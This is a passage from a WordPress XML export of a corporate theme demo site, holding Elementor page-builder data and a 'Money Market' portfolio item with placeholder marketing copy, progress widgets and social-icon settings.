innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"d2b5d19","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"9647794","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2629f6c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"c9cb36f","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"46c6f15","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"bdffb46","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0cac9de","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"68647bb","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"54147c6","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b68e8b1","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"99dae8f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"75098eb","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Money Market</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/money-market/</link>
		<pubDate>Fri, 11 Sep 2020 04:41:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=806</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>April 12, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>806</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:41:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:41:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money-market]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[807]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"16f55f4a","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"418cd74c","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ea00633","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1aec01ac","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"54e30f49","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"3f7f7a0b","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"768a37c4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bf03c4e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"14cfe9ce","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3803acb8","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"43e55b12","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"6e436e0b","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6c09acaf","elType":"widget","settings":{"editor":"<p>April 12, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7c3887","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"63f2a3ed","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"132a8999","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"73f1d5f9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"116d0b4d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"7671238","elType":"section","settings":[],"elements":[{"id":"b19615a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4904a51","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6d23a92","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f06cf1a","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"aaf0846","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"d2311d1","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"911a1bd","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8562038","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"402a98a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"8579e08","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"62a79d4","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5465ad6","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"84fa6d6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"3e5a9bd","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"f711b49","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d81ca62","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a034211","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"0da476e","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"623de99","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"002a18d","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"dfdb097","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"aceb3ce","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"a6c46ba","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"7583a6f","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 